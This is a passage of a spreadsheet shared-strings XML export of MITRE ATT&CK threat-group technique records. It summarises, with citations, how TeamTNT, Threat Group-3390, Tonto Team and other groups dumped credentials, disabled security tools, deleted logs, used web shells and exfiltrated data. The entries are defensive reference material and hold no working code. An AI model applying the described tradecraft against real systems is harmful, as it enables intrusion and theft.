    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has executed PowerShell commands in batch scripts.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>relationship--4fcdf0b6-23c7-406c-95ba-b335b05642e5</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured SSH keys.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--6bbd0299-4e8b-4d31-83c4-c690e43294c0</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</si>
  <si>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</si>
  <si>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relationship--4f85e333-375b-4a5b-8a15-a3bd061678a4</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has added batch scripts to the startup folder.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>relationship--19bede58-549b-4e7d-b206-6045370b9995</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--03527dc8-25a6-479d-b00f-90b543944da1</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</si>
  <si>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</si>
  <si>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relationship--8f4e363a-ce2b-4a36-92fb-791d8ffc30d5</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.(Citation: Trend Micro TeamTNT) (Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--6b8a8055-5b1c-4e06-a6ef-4a42e23e2e11</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</si>
  <si>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</si>
  <si>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relationship--9420a4b5-d246-4b9e-81d0-3f0551a73a15</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has added RSA keys in &lt;code&gt;authorized_keys&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--d6e1026a-a33e-46a3-832e-ff9b36d52c07</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned specific lists of target IP addresses.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--8b212643-e625-436c-943f-911be8e87c3a</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for security products on infected machines.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--8e1a4560-f9da-4729-a364-dade6bb2cdc2</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used UPX and Ezuri packer to pack its binaries.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--60db2ece-4f5e-4c47-a7eb-fd8bcf7ddc49</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for system version, architecture, disk partition, logical volume, and hostname information.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--a641447f-995a-4f06-93d2-637e265c7638</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has enumerated the host machine’s IP address.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--a7018df5-2a56-4731-ba57-5fe4ac73bac6</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</si>
  <si>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</si>
  <si>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relationship--2a562acd-e85c-42ce-89fc-b10174863980</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--26d1ecff-471e-420d-a1f0-d7b6cf9a07e6</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has created system services to execute cryptocurrency mining software.(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--0559aa0e-31c2-478b-afce-00d0939066c3</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has established persistence through the creation of a cryptocurrency mining system service using &lt;code&gt;systemctl&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--1f75578e-22d5-4f91-9de5-3309ffe107d5</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used shell scripts for execution.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--14ba8b29-133b-456d-b85d-139de4510bb1</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has uploaded backdoored Docker images to Docker Hub.(Citation: Lacework TeamTNT May 2021)</t>
  </si>
  <si>
    <t>relationship--35ca3779-c632-4a7e-a931-7472128fb10d</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.(Citation: Trend Micro TeamTNT)</t>
  </si>
  <si>
    <t>relationship--52c980ba-459b-4d3e-a0a8-f0ba3d2b6e3a</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</si>
  <si>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</si>
  <si>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relationship--e75ded50-50cc-46fe-b83b-2de8e5f7d7a6</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged iplogger.org to send collected data back to C2.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)</t>
  </si>
  <si>
    <t>relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used batch scripts to download tools and executing cryptocurrency miners.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>relationship--36897d4a-1443-4061-b065-ae6d5d8c18b2</t>
  </si>
  <si>
    <t>[TeamTNT](https://attack.mitre.org/groups/G0139) has used malware that adds cryptocurrency miners as a service.(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>relationship--331da7a8-d1ad-4feb-892a-c440aa5eb810</t>
  </si>
  <si>
    <t xml:space="preserve"> [The White Company](https://attack.mitre.org/groups/G0089) has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--49315e80-2d47-432f-8e5f-3a694a91bb45</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has the ability to delete its malware entirely from the target system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--9d42a47f-ccdc-42f0-9551-11bf5e2a9616</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has used phishing lure documents that trick users into opening them and infecting their computers.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--eba54c2a-854f-4349-9248-314519ed9c43</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--2a8c6029-7714-437a-87a2-bc91067575e6</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has obfuscated their payloads through packing.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--2155f707-de4f-4ef1-9982-1af90392af5f</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has sent phishing emails with malicious Microsoft Word attachments to victims.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--e3d8a792-5c54-4e37-9ce1-6a8555e76a03</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) has checked the current date on the victim system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--f368f221-bcd5-400d-b350-83173de26423</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>relationship--c6358f18-fc64-46f5-8939-66e5258dd83d</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors mapped network drives using &lt;code&gt;net use&lt;/code&gt;.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>relationship--0512a63b-58c8-4b0c-b2b4-e4da562cee5f</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used a victim's endpoint management platform, Altiris, for lateral movement.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>relationship--b38cfcfd-b8e3-4a9c-ade9-8a8bfeb04694</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors spawned shells on remote systems on a victim network to execute commands.(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>relationship--289e01df-60e6-4eee-830e-9d742ac10c86</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used RAR to compress, encrypt, and password-protect files prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--c8c5b766-a719-43bd-988a-cb00beedbba3</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</si>
  <si>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</si>
  <si>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relationship--17594ffb-af22-4cdc-8849-ca31d2019a9e</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) ran a command to compile an archive of file types of interest from the victim user's directories.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--b990e235-dcf4-48c7-800d-b8a10a62eda4</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use a public UAC bypass method to elevate privileges.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>relationship--b9165c4a-aac7-479d-8ad9-22c25e031a76</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--d14513b4-9c60-49cd-88ee-0cb2ffde394a</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised the Able Desktop installer to gain access to victim's environments.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--b842af96-8422-4b23-bd17-35d123c5a9b5</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has performed DLL search order hijacking to execute their payload.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>relationship--e4e2d35b-83fb-4515-b531-576acb02e1a5</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</si>
  <si>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</si>
  <si>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relationship--2a93ea80-d0f6-4b81-887d-8911f7573245</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have split RAR files for exfiltration into parts.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--0b36c1d0-d016-4c12-bf61-6dc14b29c7e0</t>
  </si>
  <si>
    <t>relationship--aec0a948-428f-4327-b466-a0472da12928</t>
  </si>
  <si>
    <t>During execution, [Threat Group-3390](https://attack.mitre.org/groups/G0027) malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>relationship--9191026d-2410-4e6d-98fe-26786a5b8bf1</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used appcmd.exe to disable logging on a victim server.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--6f884bda-0c39-4d3b-97e3-29ae9099fa45</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has registered domains for C2.(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--8074dd43-75b7-432f-9e33-af3136d90c00</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has extensively used strategic web compromises to target victims.(Citation: Dell TG-3390)(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>relationship--83075ee3-b372-48a4-a54c-ca54afdd8c0b</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.(Citation: Gallagher 2015)</t>
  </si>
  <si>
    <t>relationship--7acc1226-d784-448e-8aeb-7f58e343c4da</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exfiltrated stolen data to Dropbox.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--21ef7a27-1019-4ced-8a09-63351bbbc150</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--11e07a59-502c-44e9-9a70-03eff1433c33</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited CVE-2018-0798 in Equation Editor.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--1b9b061b-5ead-45f3-b4cc-30d8427b0649</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--0942dc11-0fcd-480a-ae4d-d571ba96331b</t>
  </si>
  <si>
    <t xml:space="preserve">[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited MS17-010 to move laterally to other systems on the network.(Citation: Unit42 Emissary Panda May 2019)	</t>
  </si>
  <si>
    <t>relationship--f9ec1b10-f819-42d8-a4b4-ecf015999cb6</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</si>
  <si>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</si>
  <si>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relationship--ab6a19e4-ce00-46cd-ae83-0798471e4a4a</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has deleted existing logs and exfiltrated file archives from a victim.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--e8193b28-b28a-4ab7-8390-8a5bd4d851b5</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .(Citation: Dell TG-3390)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--6a1693a7-1e85-48b6-9097-11339a987099</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</si>
  <si>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</si>
  <si>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relationship--6b5c6fc2-615a-46fc-80a4-9ab332159722</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used [gsecdump](https://attack.mitre.org/software/S0008) to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--36b9f594-9a27-4281-a18e-9a5e7df70ad9</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</si>
  <si>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</si>
  <si>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relationship--21f2fd40-073c-4c25-bf4e-19339ac1f99d</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used &lt;code&gt;net user&lt;/code&gt; to conduct internal discovery of systems.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--b2dbbb46-9659-4277-8753-c469c4bfe409</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has locally staged encrypted archives for later exfiltration efforts.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--1b45f3b5-b7a4-4424-a8ff-1b1f1c1a55d9</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has lured victims into opening malicious files containing malware.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--3d6e0a95-3265-4a0c-aee1-feff2807489b</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--f88fcb22-698b-4901-b894-a597192c2ba3</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use the Hunter tool to conduct network service discovery for vulnerable systems.(Citation: Dell TG-3390)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--13d8aec7-3e49-41f8-b57c-475cdc0d9632</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has detached network shares after exfiltrating files, likely to evade detection.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--dc7cb17d-c3d3-4c3c-b79e-499cede49baa</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</si>
  <si>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</si>
  <si>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relationship--658fcd28-934d-4077-b93e-89af9512de5f</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) obtained a KeePass database from a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--2c036695-32e2-458f-a0f1-25cd2e8b9fbd</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used PowerShell for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--6e6828ca-7567-4302-8ed7-fa5821dc5bbc</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can spawn `svchost.exe` and inject the payload into that process.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>relationship--17af5c1a-7912-40af-b7b9-f68f0a15977d</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can read and decrypt stored Registry values.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>relationship--3559da63-5706-4e5a-b130-89858c2c0f44</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027)'s malware can add a Registry key to `Software\Microsoft\Windows\CurrentVersion\Run` for persistence.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--64d59c09-1ecd-4711-b2b8-e46d4ffc7ede</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has moved staged encrypted archives to Internet-facing servers that had previously been compromised with [China Chopper](https://attack.mitre.org/software/S0020) prior to exfiltration.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--fa8d15db-498b-45f5-8cc1-bf4cf70e2e62</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>relationship--7b6eac00-8a13-42e3-b533-a40314eada68</t>
  </si>
  <si>
    <t>relationship--a829622f-60cf-4e24-afce-fb89270e95cb</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has packed malware and tools, including using VMProtect.(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--cbaf6578-b0f6-4d48-86c1-bfe5089b1b1f</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used e-mail to deliver malicious attachments to victims.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--30b93042-d56e-4ecf-82d8-8b287bd9c00c</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use [NBTscan](https://attack.mitre.org/software/S0590) to discover vulnerable systems.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--69682171-e717-4af7-a24a-06a39f381641</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--fe8a320f-e5e5-4503-8c3a-5c21b628a61d</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `whoami` to collect system user information.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--590756ce-b948-4d62-9608-4fadf58681f4</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</si>
  <si>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</si>
  <si>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relationship--7b050e9f-ab8e-4860-aae9-4a37e18efbe2</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised third party service providers to gain access to victim's environments.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--690c6d2a-3e02-4eb9-b835-079c50c64adf</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has hosted malicious payloads on Dropbox.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--5beed1ca-321a-47b7-a16c-02905ad96364</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has staged tools, including [gsecdump](https://attack.mitre.org/software/S0008) and WCE, on previously compromised websites.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--f2e028ed-49e0-41ec-8400-8f8dc1ae6435</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--78f237da-f58b-4849-b2ee-cf1f3f7a1a42</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) malware has used HTTP for C2.(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>relationship--db191b70-063d-433b-a462-9f7611a5a0e2</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a variety of Web shells.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--6468546f-721e-4df8-90a3-67b39a7b2834</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used command-line interfaces for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--26eafe5d-0ffc-48cf-ba1d-3681bdcbfaa3</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use WMI to execute a binary.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>relationship--d4c4e420-4e1a-420d-9d6a-08fe6d322217</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used WinRM to enable remote execution.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--df8350d6-a7a7-421d-a9e8-64d7e0cc0653</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027)'s malware can create a new service, sometimes naming it after the config information, to gain persistence.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Lunghi Iron Tiger Linux)</t>
  </si>
  <si>
    <t>relationship--68d41471-49c7-4210-8d9b-2958e95feb1a</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) has used WinSCP to exfiltrate data from a targeted organization over FTP.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--4612c0bd-f6f7-4c71-92dd-9f26ff1c3eef</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--33bba084-3681-4955-861d-2ff6fe02ad9b</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) used a cloud-based remote access software called LogMeIn for their attacks.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--52f31493-1654-4516-960d-c79018f1efd8</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>relationship--7eecb510-7937-40d2-b491-7d9165b5afc1</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) abuses a legitimate and signed Microsoft executable to launch a malicious DLL.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>relationship--16e906b5-011b-476d-a00d-78e514e7354c</t>
  </si>
  <si>
    <t>21 May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</si>
  <si>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</si>
  <si>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relationship--af7d7ff9-c74e-48da-9e6d-029161746afd</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has exploited CVE-2019-0803 and MS16-032 to escalate privileges.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--d8d1b814-2a28-402f-ab3b-f64c6d9974ce</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used EternalBlue exploits for lateral movement.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--d393d40d-d18a-4d89-9cc8-b57d3afaa9bf</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has routed their traffic through an external server in order to obfuscate their location.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--1dcca5db-e03e-4330-8705-76aaedcf295f</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has downloaded malicious DLLs which served as a [ShadowPad](https://attack.mitre.org/software/S0596) loader.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>relationship--fb03b86a-02d4-4079-815f-46369026ad17</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used keylogging tools in their operations.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--61ecf569-fd27-4c61-b1a9-a516fba16fac</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used the &lt;code&gt;ShowLocalGroupDetails&lt;/code&gt; command to identify administrator, user, and guest accounts on a compromised host.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--481fedde-ac7d-4d1b-a70a-b90ccd7acc52</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has relied on user interaction to open their malicious RTF documents.(Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>relationship--ba2d135f-cce4-4548-9298-ff8ed0d07dc7</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used tools such as [NBTscan](https://attack.mitre.org/software/S0590) to enumerate network shares.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--09673a33-d15e-460a-8980-55c67ee2bb19</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has used a variety of credential dumping tools.(Citation: TrendMicro Tonto Team October 2020) </t>
  </si>
  <si>
    <t>relationship--6e43af09-b4bb-46dc-87f3-e2b72e70b47a</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used PowerShell to download additional payloads.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>relationship--d850b604-f451-4f58-aa8e-6fb2e2a307d0</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has used Python-based tools for execution.(Citation: TrendMicro Tonto Team October 2020) </t>
  </si>
  <si>
    <t>relationship--27f561f4-2631-4d82-b384-4e7a208ba484</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has delivered payloads via spearphishing attachments.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>relationship--cbadd419-3f8c-485a-a458-09caed90d82e</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used a first stage web shell after compromising a vulnerable Exchange server.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>relationship--9b6bebc2-caf5-4b22-847d-ef43881f9bd6</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</si>
  <si>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</si>
  <si>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relationship--6c9abd4f-d439-40ff-94fa-dd397d473942</t>
  </si>
  <si>
